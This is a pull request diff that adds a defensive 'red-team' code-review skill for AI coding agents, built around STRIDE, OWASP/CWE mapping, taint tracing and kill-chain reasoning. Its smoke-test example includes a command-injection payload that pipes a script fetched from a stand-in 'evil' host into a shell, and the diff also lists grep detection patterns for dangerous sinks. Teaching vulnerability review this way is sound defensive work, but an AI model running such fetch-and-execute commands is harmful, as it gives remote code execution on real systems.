### PR TITLE
feat(red-team): add adversarial code-review skill

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 # 🎯 Agent Skills
 
 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
-[![Skills](https://img.shields.io/badge/skills-8-blue.svg)](./#available-skills)
+[![Skills](https://img.shields.io/badge/skills-9-blue.svg)](./#available-skills)
 [![Release](https://img.shields.io/github/v/release/bntvllnt/agent-skills?display_name=tag&sort=semver)](https://github.com/bntvllnt/agent-skills/releases/latest)
 
 **Compatible with:** Claude Code • OpenCode • Windsurf • Cursor • More via [skills.sh](https://skills.sh)
@@ -88,6 +88,14 @@ Complete tmux management: sessions, windows, panes, layouts, and scripting/autom
 
 ---
 
+### [Red Team](./red-team/) - Adversarial Code Review
+
+Find vulnerabilities in your own codebase with an attacker's mindset. STRIDE threat modeling, OWASP/CWE mapping, attack-surface enumeration, Lockheed kill-chain reasoning, severity scoring, and remediation with regression tests. **Defensive use only** — Phase 0 authorization gate.
+
+[View skill documentation →](./red-team/SKILL.md)
+
+---
+
 ## Installation Options
 
 Install specific skill:
@@ -108,6 +116,8 @@ npx skills add bntvllnt/agent-skills --skill convex
 npx skills add bntvllnt/agent-skills --skill workflow
 
 npx skills add bntvllnt/agent-skills --skill tmux
+
+npx skills add bntvllnt/agent-skills --skill red-team
 ```
 
 Global install:
@@ -127,6 +137,8 @@ npx skills add bntvllnt/agent-skills --skill convex -g
 npx skills add bntvllnt/agent-skills --skill workflow -g
 
 npx skills add bntvllnt/agent-skills --skill tmux -g
+
+npx skills add bntvllnt/agent-skills --skill red-team -g
 ```
 
 Specific agent:
@@ -146,6 +158,8 @@ npx skills add bntvllnt/agent-skills --skill convex --agent claude-code
 npx skills add bntvllnt/agent-skills --skill workflow --agent claude-code
 
 npx skills add bntvllnt/agent-skills --skill tmux --agent claude-code
+
+npx skills add bntvllnt/agent-skills --skill red-team --agent claude-code
 ```
 
 ---

--- a/docs/skills-overview.md
+++ b/docs/skills-overview.md
@@ -14,6 +14,7 @@ Agent Skills is a collection of reusable AI agent capabilities, distributed via 
 | [convex](../convex/SKILL.md) | Convex backend: functions, schemas, auth, scheduling |
 | [workflow](../workflow/SKILL.md) | High-velocity solo development: plan, ship, fix, review, done |
 | [tmux](../tmux/SKILL.md) | Terminal multiplexer: sessions, windows, panes, layouts |
+| [red-team](../red-team/SKILL.md) | Adversarial code review: STRIDE, OWASP/CWE, attack surface, kill chain, severity scoring |
 
 ## How Skills Work
 

--- a/llms.txt
+++ b/llms.txt
@@ -23,6 +23,7 @@ Install: `npx skills add bntvllnt/agent-skills`
 - [Convex](convex/SKILL.md): Convex backend — functions, schemas, auth, scheduling, workflows
 - [Workflow](workflow/SKILL.md): High-velocity solo development — plan, ship, fix, review, done
 - [tmux](tmux/SKILL.md): Terminal multiplexer — sessions, windows, panes, layouts, scripting
+- [Red Team](red-team/SKILL.md): Adversarial code review — STRIDE, OWASP/CWE, attack surface, kill chain, severity, remediation
 
 ## Optional
 

--- a/red-team/README.md
+++ b/red-team/README.md
@@ -1,0 +1,84 @@
+# Red Team — Adversarial Code Review
+
+Find vulnerabilities in your own codebase by adopting an attacker's mindset. **The best defence is attack.**
+
+## What This Does
+
+Reverses the polarity of code review. Stops asking *"is this code safe?"* and starts asking *"how would I break this?"*. Combines:
+
+- **STRIDE** threat modeling per asset
+- **OWASP Top 10 / CWE Top 25** classification
+- **Attack-surface enumeration** — entry points → trust boundaries → sinks
+- **Lockheed kill chain + MITRE ATT&CK** for exploit-chain reasoning
+- **DREAD / CVSS** severity scoring
+- **Defensive-disclosure** report format with proof + remediation + regression test
+
+## Authorized Use Only
+
+This skill is **defensive**. It works against:
+
+- Code in your working directory
+- Systems for which you have explicit written authorization to test (CTF, owned infra, signed pentest scope)
+
+It refuses operations against unauthorized third-party systems. Phase 0 (scope) is blocking.
+
+## When To Use
+
+| Situation | Mode |
+|-----------|------|
+| New auth / payment / external-input feature | Threat model |
+| Existing codebase, posture unknown | Attack-surface map |
+| Specific file / endpoint / function | Code-level red team |
+| Pre-merge / pre-release gate | Full 7-phase pass |
+| Post-incident triage | Indicator hunt |
+
+## Entry Points
+
+| Say | Action |
+|-----|--------|
+| "red team this code" | Run 7-phase protocol |
+| "threat model [X]" | STRIDE + Shostack 4 questions |
+| "attack surface of [repo]" | Enumerate entry → sink paths |
+| "find vulnerabilities in [file]" | Adversarial code review |
+| "exploit chain from [X] to [Y]" | Kill-chain walk |
+| "severity of [finding]" | DREAD / CVSS scoring |
+| "report [findings]" | Writeup with remediation + tests |
+
+## The 7 Phases
+
+```
+0. SCOPE        Confirm authorization (BLOCKING)
+1. RECON        Map languages, frameworks, deps, deploy
+2. ENUM         Entry points + trust boundaries + sinks
+3. THREAT       STRIDE per asset + OWASP/CWE mapping
+4. VULN HUNT    Adversarial search per threat
+5. EXPLOIT      Chain bugs into kill-chain stages
+6. IMPACT       Score with DREAD or CVSS
+7. REPORT       Severity-ranked findings + fix + regression test
+```
+
+## Files
+
+- `SKILL.md` — frontmatter, router, phases, anti-patterns
+- `references/scope-and-authorization.md` — Phase 0 + refusal triggers
+- `references/threat-modeling.md` — STRIDE, Shostack 4 questions, DFD
+- `references/attack-surface.md` — entry / boundary / sink + taint tracing
+- `references/code-review-protocol.md` — 7-phase walkthrough with adversarial questions
+- `references/kill-chain.md` — Lockheed + MITRE ATT&CK
+- `references/owasp-cwe.md` — Top 10 / Top 25 with code patterns
+- `references/secret-hunting.md` — secrets in code, history, logs
+- `references/supply-chain.md` — dep audit, lockfile, typo-squat
+- `references/reporting.md` — severity + writeup template
+
+## Optional CLI Helpers
+
+If installed locally, the skill will use them in recon. If not, it falls back to manual `Grep` + `Read`:
+
+- `semgrep` — SAST patterns
+- `gitleaks` / `trufflehog` — secret scanning
+- `npm audit` / `pnpm audit` / `pip-audit` / `osv-scanner` — dep CVEs
+- `snyk` — dep + container
+
+## License
+
+MIT

--- a/red-team/SKILL.md
+++ b/red-team/SKILL.md
@@ -1,0 +1,321 @@
+---
+name: red-team
+description: |
+  Find vulnerabilities in your own codebase by adopting an attacker's mindset. "The best defence is attack." Combines STRIDE threat modeling, OWASP Top 10 / CWE Top 25 mapping, attack-surface enumeration, exploit-chain reasoning, and a kill-chain reporting format.
+  For DEFENSIVE use only: hardening code you own or have written authorization to test. Refuses ops against systems without authorization.
+  Auto-activates on: "red team", "red-team", "attacker mindset", "find vulnerabilities", "vuln hunt", "vulnerability hunt", "threat model", "attack surface", "security audit", "pentest", "penetration test", "stride", "owasp", "exploit chain", "kill chain", "best defence is attack".
+license: MIT
+compatibility: Agent-agnostic. Works on any codebase. Optional CLI helpers — semgrep, trufflehog, gitleaks, npm/pnpm/yarn audit, snyk — if present, used in recon.
+metadata:
+  version: "1.0"
+allowed-tools: Read Glob Grep Bash
+---
+
+# Red Team — Adversarial Code Review
+
+> "The best defence is attack." Reverse the polarity of code review: stop asking *"is this safe?"* and start asking *"how would I break this?"*
+
+## Authorized Use Only (BLOCKING)
+
+This skill operates in a **defensive** posture. It only performs attacker-style reasoning against:
+
+- Code in the working directory the user opened.
+- Systems for which the user has explicit written authorization to test (e.g. they own it, or have a signed pentest scope).
+
+It will **refuse** to:
+
+- Generate exploit payloads aimed at third-party systems.
+- Probe live production systems without authorization.
+- Bypass detection of services not owned by the user.
+- Provide instructions whose only purpose is undetected attack on others.
+
+If scope is unclear, the skill **stops and asks** before proceeding. See `references/scope-and-authorization.md`.
+
+## When To Use
+
+| Situation | Mode | Output |
+|-----------|------|--------|
+| New feature touching auth / payments / external input | **Threat model** | STRIDE table per asset + mitigations |
+| Existing codebase, security posture unknown | **Attack-surface map** | Entry points + reachable assets + risk ranking |
+| Specific file / endpoint / function | **Code-level red team** | Vuln list with CWE + exploit chain + severity |
+| Pre-release / pre-merge gate | **Kill-chain pass** | Recon → enum → vuln → exploit → impact → remediation |
+| Suspected compromise / incident triage | **Indicator hunt** | IoCs in logs/code/deps + persistence vectors |
+
+## Router
+
+| User says | Load reference | Do |
+|---|---|---|
+| "threat model [X]" / "stride on [X]" | `references/threat-modeling.md` | STRIDE + 4-question framework |
+| "attack surface" / "entry points" / "what can be reached" | `references/attack-surface.md` | enumerate inputs/sinks/trust boundaries |
+| "find vulnerabilities" / "vuln hunt" / "red team this code" | `references/code-review-protocol.md` | 7-phase adversarial code review |
+| "exploit chain" / "how would they get from X to Y" | `references/kill-chain.md` | Lockheed kill chain + MITRE ATT&CK mapping |
+| "owasp" / "cwe" / "what category is this" | `references/owasp-cwe.md` | classification + remediation patterns |
+| "secrets" / "hardcoded credentials" | `references/secret-hunting.md` | gitleaks/trufflehog + manual patterns |
+| "supply chain" / "dependencies" | `references/supply-chain.md` | dep audit + lockfile + typo-squat checks |
+| "report" / "writeup" / "findings" | `references/reporting.md` | severity-scored writeup template |
+
+## Core Principle
+
+```
+DEFENSIVE REVIEW                  RED-TEAM REVIEW
+─────────────────                 ────────────────
+"Is this code correct?"           "How do I make this code wrong?"
+"Does it handle the case?"        "What case does it fail to handle?"
+"Is input validated?"             "What input bypasses this validator?"
+"Is auth checked?"                "What path skips the auth check?"
+"Is data encrypted?"              "Where is the unencrypted copy?"
+                                  "Where is the key?"
+```
+
+The skill enforces the right column. Defensive thinking is filtered out during review (it returns during remediation).
+
+## The 7-Phase Protocol
+
+```
+┌──────────────┐
+│ 0. SCOPE     │  Confirm authorization. Define in/out of scope.
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 1. RECON     │  Map the codebase. Languages, frameworks, deps, deploy targets.
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 2. ENUM      │  Enumerate attack surface: entry points, trust boundaries, secrets, sinks.
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 3. THREAT    │  Apply STRIDE per asset. Map to OWASP Top 10 / CWE Top 25.
+│    MODEL     │
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 4. VULN      │  Code-level search for each threat. Confirm with PoC reasoning.
+│    HUNT      │
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 5. EXPLOIT   │  Chain vulnerabilities — recon → exec → escalate → persist → exfil.
+│    CHAIN     │
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 6. IMPACT    │  Score each chain (CVSS-lite or DREAD). Rank by exploitability + blast.
+└──────┬───────┘
+       ▼
+┌──────────────┐
+│ 7. REPORT +  │  Severity-ranked findings + concrete remediation per vuln.
+│    REMEDIATE │  Verify fix doesn't introduce regression.
+└──────────────┘
+```
+
+Each phase has a **stop condition**. If phase N produces nothing, do not skip to N+2 — go back to N-1.
+
+## Phase 0 — Scope (BLOCKING)
+
+Before any reconnaissance:
+
+```
+1. WHAT codebase / system / endpoint?
+2. WHO authorized this review? (user owns it / written scope / CTF / training)
+3. WHAT is OUT of scope? (third-party services, customer data, prod endpoints)
+4. WHAT artifact is expected? (writeup / fix list / threat model / PR comments)
+```
+
+If any of (1)-(3) is ambiguous, **ask before continuing**. See `references/scope-and-authorization.md`.
+
+## Phase 1 — Recon
+
+Build a structural picture of the target. **Read, don't run.** No code execution against live services.
+
+| Layer | Look for | Tools |
+|-------|----------|-------|
+| Languages / frameworks | `package.json`, `go.mod`, `pyproject.toml`, `Cargo.toml`, `Gemfile` | `Read`, `Glob` |
+| Routes / endpoints | route registrations, decorators, OpenAPI specs | `Grep` for `@route`, `app.get`, `Router`, `mux.Handle` |
+| Auth boundary | session / JWT / OAuth / API key / cookie config | `Grep` for `auth`, `session`, `jwt`, `verify` |
+| External I/O | network calls, file I/O, shell exec, deserialization | `Grep` for `fetch`, `axios`, `exec`, `eval`, `pickle` |
+| Storage | DB clients, ORM, raw SQL, NoSQL drivers | `Grep` for `query`, `find`, `aggregate`, `raw` |
+| Secrets / config | env vars, config files, hardcoded literals | `gitleaks` / `trufflehog` / manual `Grep` |
+| Deps | direct + transitive, lockfiles, audit reports | `npm audit`, `pnpm audit`, `pip-audit`, `osv-scanner` |
+| Deploy target | Dockerfile, k8s, CI/CD, IaC | `Read` of those files |
+
+Output: a one-page recon brief (architecture sketch + attack-surface candidates).
+
+## Phase 2 — Enumerate Attack Surface
+
+For each entry point identified in Recon, classify:
+
+| Class | Examples | Why it matters |
+|-------|----------|----------------|
+| External (untrusted) | HTTP routes, webhooks, file uploads, RPC, queues consuming external messages | Direct attacker control |
+| Internal (semi-trusted) | Internal service calls, admin tools | Lateral movement target |
+| Boundary | Auth middleware, validation, parsers, deserializers | Bypass = full surface exposure |
+| Sink (dangerous) | DB query, shell exec, file write, template render, eval, subprocess | Where bugs become RCE / SQLi |
+
+Trace each external entry point to each sink. **A path from external entry to a dangerous sink is a candidate vulnerability** until proven otherwise.
+
+See `references/attack-surface.md` for taint-tracing patterns.
+
+## Phase 3 — Threat Model (STRIDE)
+
+For each asset (data store, service, identity), apply **STRIDE**:
+
+| Letter | Threat | Asks |
+|--------|--------|------|
+| **S** | Spoofing | Can the attacker pretend to be another principal? |
+| **T** | Tampering | Can the attacker modify data in transit / at rest / in memory? |
+| **R** | Repudiation | Can an action be performed without an attributable log? |
+| **I** | Information disclosure | What data leaks if this asset is touched? |
+| **D** | Denial of service | What input / load makes this asset unavailable? |
+| **E** | Elevation of privilege | What action lets a low-priv principal act as high-priv? |
+
+Then ask Shostack's 4 questions for the system overall:
+
+1. What are we building?
+2. What can go wrong? *(STRIDE per asset)*
+3. What are we doing about it?
+4. Did we do a good job? *(test the mitigations)*
+
+See `references/threat-modeling.md` for the full template.
+
+## Phase 4 — Vuln Hunt (Adversarial Code Review)
+
+For each STRIDE threat, search the code for it. **Reverse the question** — instead of "is X protected?" ask "where is X *not* protected?"
+
+| Threat | Code patterns to search |
+|--------|--------------------------|
+| Injection | string concatenation in queries, unparameterized SQL, `eval`, `exec`, template-string in shell |
+| Auth bypass | route handlers without auth middleware, conditional auth, IDOR (object refs from user input without ownership check) |
+| Authz bypass | role checks based on user-controlled input, missing checks on internal endpoints |
+| Crypto | `Math.random` for tokens, MD5/SHA1 for passwords, hardcoded keys, no IV / fixed IV |
+| Deserialization | `pickle.loads`, `unserialize`, `yaml.load` without `SafeLoader`, JSON revivers with prototype access |
+| SSRF | URL fetched from user input, no allowlist, no DNS rebinding mitigation |
+| Path traversal | `path.join` with user input + no normalization + no chroot |
+| XSS | innerHTML / dangerouslySetInnerHTML / template auto-escape disabled |
+| CSRF | mutating routes without CSRF token / SameSite cookie missing |
+| Race conditions | check-then-act on shared state, TOCTOU, double-spend on payments |
+| Secrets | hardcoded API keys, tokens in logs, secrets in error messages |
+| Supply chain | typo-squatted deps, unverified install scripts, postinstall hooks |
+
+Map each finding to **CWE** + **OWASP Top 10** category. See `references/owasp-cwe.md`.
+
+## Phase 5 — Exploit Chain (Lockheed Kill Chain)
+
+Single bugs are interesting. **Chains are dangerous.** Walk through:
+
+```
+RECON  →  WEAPONIZE  →  DELIVERY  →  EXPLOIT  →  INSTALL  →  C2  →  ACTIONS
+```
+
+For each significant vuln, ask:
+
+1. How would an attacker discover this from outside? (recon)
+2. What input triggers it? (weaponize)
+3. How does the input arrive? (delivery — endpoint, queue, file upload)
+4. What primitive does it grant? (read / write / exec)
+5. How does that primitive escalate? (chain to next vuln)
+6. How does the attacker maintain access? (persistence — backdoors, scheduled jobs, cron)
+7. What's the final action — exfil, ransom, lateral movement?
+
+A vuln that grants only "log noise" is low impact. A vuln that grants RCE is high. A vuln that grants RCE + persistence + exfil is critical.
+
+Map each step to **MITRE ATT&CK** technique IDs where applicable. See `references/kill-chain.md`.
+
+## Phase 6 — Impact (Severity Scoring)
+
+For each chain, score with **DREAD-lite** or **CVSS v3**:
+
+| Dimension | Question | 1 | 3 | 5 |
+|-----------|----------|---|---|---|
+| **D**amage | Worst-case impact? | minor info leak | data tampering / partial RCE | full RCE / data theft |
+| **R**eproducibility | How reliable is the exploit? | rare conditions | sometimes | always |
+| **E**xploitability | How hard to execute? | expert + tools | scripted | one curl |
+| **A**ffected users | Blast radius? | one user | tenant | all users |
+| **D**iscoverability | How easy to find? | source-code-only | logs | externally observable |
+
+Sum: 5-12 = Low, 13-19 = Medium, 20-25 = High/Critical.
+
+Or use CVSS calculator for industry-standard scores.
+
+## Phase 7 — Report + Remediate
+
+Per finding:
+
+```markdown
+## [SEV] Title (CWE-XXX, OWASP A0X:2021)
+
+**Asset**: [what's affected]
+**Entry point**: [where attacker delivers]
+**Sink**: [where damage occurs]
+**Path**: file.ts:L23 → file.ts:L45 → other.ts:L12
+**Score**: DREAD 22/25 — Critical
+
+### Exploit Chain
+1. [step]
+2. [step]
+3. [final impact]
+
+### Proof of Concept (defensive)
+[input/payload that triggers the bug — minimal, no live targets]
+
+### Root Cause
+[the actual flaw — not just the symptom]
+
+### Remediation
+- [Specific code change. Diff snippet preferred.]
+- [Defense-in-depth: secondary mitigation]
+
+### Verification
+- [Test that fails before fix, passes after]
+- [Regression test for the chain]
+```
+
+See `references/reporting.md` for the full template.
+
+## Anti-Patterns (NEVER)
+
+- NEVER skip Phase 0. Authorization is non-negotiable.
+- NEVER report a vuln without a path: file:line of entry → file:line of sink.
+- NEVER score severity without an exploit chain — a "theoretical" CVE-9 with no reachable path is not a CVE-9.
+- NEVER stop at single vulns. Always try to chain. The chain reveals the real impact.
+- NEVER recommend remediation without a regression test. The fix must be testable.
+- NEVER leak findings to public channels (issues, PRs, chats) before the fix lands. Coordinate disclosure.
+- NEVER attack systems out of scope. If the chain crosses a trust boundary you don't own, **stop and report the boundary** — don't cross it.
+
+## Smoke Test
+
+User: *"Red team this Express endpoint: `app.post('/api/run', (req, res) => { exec(req.body.cmd, ...) })`"*
+
+Expected output:
+
+```
+SEV: CRITICAL — Command Injection (CWE-78, OWASP A03:2021)
+Asset: server shell
+Entry: POST /api/run, body.cmd
+Sink: child_process.exec(req.body.cmd)
+Path: route handler line 1 → exec line 1
+Chain:
+  1. attacker POSTs {"cmd":"curl evil/sh | sh"}
+  2. exec runs in shell context → arbitrary command execution
+  3. RCE → install reverse shell → persist → lateral
+Severity: DREAD 25/25, CVSS 10.0
+Remediation:
+  - Remove exec entirely if possible.
+  - If shell exec is required: use spawn(args[]) with argv list, not a shell string. Allowlist commands.
+  - Add auth + audit log + rate limit.
+Verification:
+  - Test: POST malicious payload, expect 403 / sanitized rejection.
+  - Regression: integration test asserting no shell metacharacters reach exec.
+```
+
+## References
+
+- `references/scope-and-authorization.md` — Phase 0 scoping + refusal triggers
+- `references/threat-modeling.md` — STRIDE per asset, Shostack 4 questions, data-flow diagrams
+- `references/attack-surface.md` — entry points, trust boundaries, taint tracing
+- `references/code-review-protocol.md` — 7-phase code review with adversarial questions
+- `references/kill-chain.md` — Lockheed kill chain, MITRE ATT&CK mapping, exploit chains
+- `references/owasp-cwe.md` — OWASP Top 10 / CWE Top 25 with code patterns + remediation
+- `references/secret-hunting.md` — gitleaks, trufflehog, manual patterns, log scrubbing
+- `references/supply-chain.md` — dep audit, lockfiles, typo-squat, install-script attacks
+- `references/reporting.md` — severity scoring + writeup template

--- a/red-team/references/attack-surface.md
+++ b/red-team/references/attack-surface.md
@@ -1,0 +1,229 @@
+# Attack-Surface Enumeration & Taint Tracing
+
+Phase 2 of the protocol. Produces the input → sink graph that drives Phase 4 vuln hunting.
+
+## Definitions
+
+- **Entry point**: any code path where attacker-controlled input enters the system.
+- **Trust boundary**: a code/network boundary where authority levels change. Crossing it requires a control.
+- **Sink**: code that performs a sensitive or dangerous operation (DB query, exec, write, render).
+- **Taint**: a label on data meaning *"originated from an untrusted source."* Removed only by validation/sanitization.
+
+A vulnerability is, in 90% of cases: **tainted data reaches a sink without losing its taint label.**
+
+## Entry Point Inventory
+
+Search systematically. For each language/framework:
+
+### Web (HTTP)
+
+```
+# Express / Fastify / Koa
+Grep: "app\\.(get|post|put|delete|patch)" 
+Grep: "router\\.(get|post|put|delete|patch)"
+Grep: "addHandler", "registerRoute"
+
+# Next.js / Remix
+Glob: "app/api/**/route.{ts,js}"
+Glob: "pages/api/**/*.{ts,js}"
+
+# Django / Flask
+Grep: "@app\\.route", "@api_view", "path\\(", "url\\("
+
+# Go
+Grep: "mux\\.Handle", "http\\.HandleFunc", "echo\\.GET"
+
+# Rails
+Grep: "resources :", "get '", "post '"
+```
+
+### Webhook / Event
+
+```
+Grep: "webhook", "callback"
+Grep: "Stripe.webhooks", "shopify.*webhook"
+Grep: "addEventListener", "subscribe"
+```
+
+### Queue Consumers
+
+```
+Grep: "consumer", "subscribe.*queue"
+Grep: "kafka", "rabbitmq", "sqs"
+```
+
+### File Upload
+
+```
+Grep: "multer", "formidable", "busboy"
+Grep: "multipart/form-data"
+Grep: "FileSystemAccess"
+```
+
+### gRPC / RPC
+
+```
+Glob: "*.proto"
+Grep: "rpc ", "service "
+```
+
+### CLI / argv
+
+```
+Grep: "process\\.argv", "argparse", "commander", "yargs"
+```
+
+### Deserialization
+
+Treat any deserializer as an entry point if input is external:
+
+```
+Grep: "JSON.parse", "yaml.load", "pickle.loads", "unserialize", "msgpack"
+```
+
+## Trust Boundaries
+
+A **trust boundary** is anywhere authority changes. Common ones:
+
+| Boundary | Direction | Required control |
+|----------|-----------|------------------|
+| Internet → web tier | inbound | TLS, WAF, rate limit, input validation |
+| Web tier → DB | outbound | parameterized queries, least-priv DB user |
+| Web tier → internal service | outbound | mTLS, signed requests, allowlist |
+| Web tier → external API | outbound | TLS, API key in env, no SSRF |
+| Auth-anonymous → authenticated | conditional | session check, redirect |
+| Authenticated → authorized for resource | conditional | ownership/role check (IDOR guard) |
+| User → admin | conditional | role check, MFA, separate plane |
+| Process → file system | outbound | path normalization, chroot, sandbox |
+| Process → shell | outbound | argv (not shell string), allowlist |
+
+Mark boundaries on the DFD. **Every boundary needs a control. Missing control = candidate finding.**
+
+## Sink Inventory
+
+The dangerous operations. Map each by language:
+
+### Code execution
+
+```
+Grep: "eval\\(", "Function\\(", "vm\\.runIn"
+Grep: "exec\\(", "spawn\\(.*shell", "child_process"
+Grep: "subprocess\\.(call|run|Popen).*shell=True"
+Grep: "os\\.system", "popen"
+```
+
+### Query
+
+```
+Grep: "\\.query\\(", "\\.exec\\(", "\\.raw\\("
+Grep: "db\\.collection.*find.*\\$where"
+```
+
+### File / path
+
+```
+Grep: "fs\\.(readFile|writeFile|createReadStream).*req\\.", "open\\(.*req\\."
+Grep: "path\\.join.*req\\."
+```
+
+### Network
+
+```
+Grep: "fetch\\(.*req\\.", "axios.*req\\.", "http\\.get.*req\\."
+```
+
+### Render / interpolate
+
+```
+Grep: "innerHTML", "dangerouslySetInnerHTML"
+Grep: "Markup\\(", "render_template_string", "Jinja.*autoescape=False"
+```
+
+### Crypto
+
+```
+Grep: "Math\\.random", "crypto\\.createHash\\('md5'\\)", "createHash\\('sha1'\\)"
+Grep: "ECB", "DES", "RC4"
+```
+
+### Auth / session
+
+```
+Grep: "session\\[", "jwt\\.sign", "jwt\\.verify"
+```
+
+## Taint Tracing
+
+For each entry → sink combination, trace the data flow:
+
+```
+INPUT (tainted)
+   │
+   ▼
+[validation?]  ←── if absent, taint persists
+   │
+   ▼
+[transformation]  ←── may sanitize, may not
+   │
+   ▼
+[boundary crossing]  ←── auth check needed?
+   │
+   ▼
+SINK (dangerous)
+```
+
+For each step, ask:
+
+1. Does this step **remove** the taint? (e.g. parameterized query removes SQL-injection taint at the DB driver)
+2. Does this step **transform** the taint into a different one? (e.g. JSON parse may turn SQL injection into prototype pollution)
+3. Does this step **trust the upstream**? (e.g. internal API call assumes input was validated by the front door)
+
+Common taint-removal mechanisms:
+
+| Sink type | Correct remover |
+|-----------|-----------------|
+| SQL | parameterized query (NOT escaping) |
+| Shell | argv array (NOT shell escaping) |
+| HTML | template auto-escape (NOT manual escape unless audited) |
+| LDAP | RFC 4515 escape |
+| OS path | normalize + allowlist + base-dir check |
+| URL fetch | host allowlist + DNS resolution check (SSRF) |
+
+## Output Template
+
+```markdown
+## Attack Surface — [System]
+
+### Entry Points
+| ID | Type | Path | File | Auth required? | Notes |
+|----|------|------|------|----------------|-------|
+| E01 | HTTP POST | /api/upload | api/upload.ts:L12 | yes | accepts multipart |
+| E02 | webhook | /hooks/stripe | api/hooks.ts:L34 | sig-only | verifies HMAC? |
+
+### Trust Boundaries
+| ID | From | To | Control | Adequate? |
+|----|------|----|---------|-----------|
+| B01 | internet | web tier | WAF + auth | yes |
+| B02 | web tier | DB | parameterized queries | check Phase 4 |
+
+### Sinks
+| ID | Type | File | Tainted from? |
+|----|------|------|---------------|
+| S01 | exec | worker.ts:L88 | E01? |
+| S02 | SQL raw | repo.ts:L201 | E03 |
+
+### Entry → Sink Paths (Candidate Vulns)
+| ID | Entry | Path (file:line steps) | Sink | Tainted? | Verified |
+|----|-------|------------------------|------|----------|----------|
+| P01 | E01 | upload.ts:L12 → process.ts:L44 → worker.ts:L88 | S01 | yes | confirmed CWE-78 |
+```
+
+Each `P` row in the candidate-vulns table is the input to Phase 4.
+
+## Anti-Patterns (NEVER)
+
+- NEVER trust internal services without applying the same controls as external. Assume breach.
+- NEVER assume the front door validated input. Re-check at each layer (defense in depth).
+- NEVER conflate "encoded" with "sanitized." Encoding is for output; validation is for input.
+- NEVER trust client-side validation. The browser is hostile.
+- NEVER trust the framework's "secure defaults" without verifying the version + config.

--- a/red-team/references/code-review-protocol.md
+++ b/red-team/references/code-review-protocol.md
@@ -1,0 +1,238 @@
+# Code-Review Protocol — Adversarial Walkthrough
+
+The 7-phase protocol expanded with concrete questions, file:line evidence requirements, and stop conditions per phase.
+
+## Mindset
+
+Reverse every defensive question:
+
+```
+DEFENSIVE                          ADVERSARIAL
+─────────                          ───────────
+"Is this validated?"               "What input bypasses this validator?"
+"Is auth checked?"                 "What path skips this check?"
+"Is the query safe?"               "Where does user input meet a query?"
+"Is this encrypted?"               "Where is the unencrypted copy?"
+"Is the secret stored safely?"     "Where in the repo / history / logs is it?"
+"Is the dep up to date?"           "What CVE applies to this version?"
+"Did the test pass?"               "What test would have caught this?"
+```
+
+The adversarial form is what produces findings.
+
+## Phase 1 — Recon (Detail)
+
+Goal: build a structural map. **No live probes.**
+
+### Questions to answer
+
+- What languages? (`Glob: "**/*.{ts,js,py,go,rb,java,rs}"`)
+- What frameworks? (`Read: package.json, pyproject.toml, go.mod, Gemfile`)
+- What deploys? (`Glob: "Dockerfile, **/k8s/**, .github/workflows/**, terraform/**"`)
+- What auth? (`Grep: "auth, session, jwt, oauth, saml"`)
+- What data? (`Grep: "schema.prisma, *.sql, models/**"`)
+- What secrets are referenced? (`Grep: "process.env\\.[A-Z_]+"`)
+
+### Stop condition
+
+A one-page recon brief exists. If not, do not proceed to enumeration.
+
+## Phase 2 — Enumerate (Detail)
+
+Goal: produce the entry-point / trust-boundary / sink graph from `attack-surface.md`.
+
+### Questions
+
+- For each entry point: who can call it? (auth required?)
+- For each boundary: what control protects it?
+- For each sink: what data feeds it?
+- Which entries reach which sinks?
+
+### Stop condition
+
+A list of (entry, sink, path) candidates exists. If empty, recon was incomplete.
+
+## Phase 3 — Threat Model (Detail)
+
+Goal: STRIDE per asset → ranked threats. See `threat-modeling.md`.
+
+### Stop condition
+
+For each asset, every STRIDE row is filled with either a mitigation or a "no — investigate in Phase 4" entry.
+
+## Phase 4 — Vuln Hunt (Detail)
+
+Per (entry, sink, path) candidate from Phase 2 + per "investigate" item from Phase 3, perform adversarial review.
+
+### Per-finding template
+
+For each suspicious code path:
+
+```markdown
+### Candidate: [name]
+
+**Entry**: file.ts:L23 — POST /api/x
+**Sink**: file.ts:L88 — exec(...)
+**Path**: 
+  1. file.ts:L23 — req.body.cmd captured
+  2. processor.ts:L14 — passed unchanged to worker
+  3. worker.ts:L88 — exec(input)
+
+**Adversarial questions**:
+- Q: What validation happens between L23 and L88?
+- A: [evidence — show the lines]
+
+- Q: What input bypasses that validation?
+- A: [the bypass — concrete example]
+
+- Q: Does this match a known CWE?
+- A: [CWE-XX, OWASP A0X]
+
+**Verdict**: Confirmed / Refuted / Need-more-context
+```
+
+### Class-by-class adversarial questions
+
+#### Injection (CWE-89, CWE-77, CWE-78, CWE-94)
+
+```
+- Where does user input meet a query / shell / template / eval?
+- Is the bridge a parameterizing API or string concat?
+- If parameterizing — is it actually parameterizing? (some libs accept identifiers via concat)
+- Is there a "raw" / "unsafe" escape hatch nearby? Why is it there?
+```
+
+#### Auth / Authz (CWE-287, CWE-862, CWE-863, CWE-639 IDOR)
+
+```
+- Which routes are auth-checked? Which aren't? Which sometimes-are?
+- Where is the role checked? Once at the gateway, or per-resource?
+- For each resource ID accepted from the user, is there an ownership check?
+- Are admin-only routes only checked by URL path? (path traversal, case mismatch)
+- Is auth disabled in dev / test / debug — and is that flag derivable from prod?
+```
+
+#### Crypto (CWE-327, CWE-330, CWE-321, CWE-916)
+
+```
+- Is "random" actually CSPRNG?
+- Are passwords hashed with argon2/bcrypt/scrypt — not MD5/SHA1/plain SHA256?
+- Are secrets in env vars, not source / config commits?
+- Are JWT secrets long, rotated, not the default "secret" string?
+- Are encryption keys derived per-tenant / per-key, or is there one master?
+- Are signatures verified BEFORE parsing?
+```
+
+#### Deserialization (CWE-502)
+
+```
+- pickle / unserialize / yaml.load / java ObjectInputStream — over external input?
+- Are JSON revivers triggered (prototype pollution, Object.assign with __proto__)?
+- Are XXE protections enabled in XML parsers?
+```
+
+#### SSRF (CWE-918)
+
+```
+- Is the URL controlled by user input?
+- Is there a host allowlist?
+- Is DNS rebinding mitigated (resolve once, pin)?
+- Can the URL hit cloud metadata (169.254.169.254, fd00:ec2::254)?
+- Are redirects followed without re-checking the destination?
+```
+
+#### Path traversal (CWE-22)
+
+```
+- Is filename from user input?
+- Is `path.join` followed by a base-dir check?
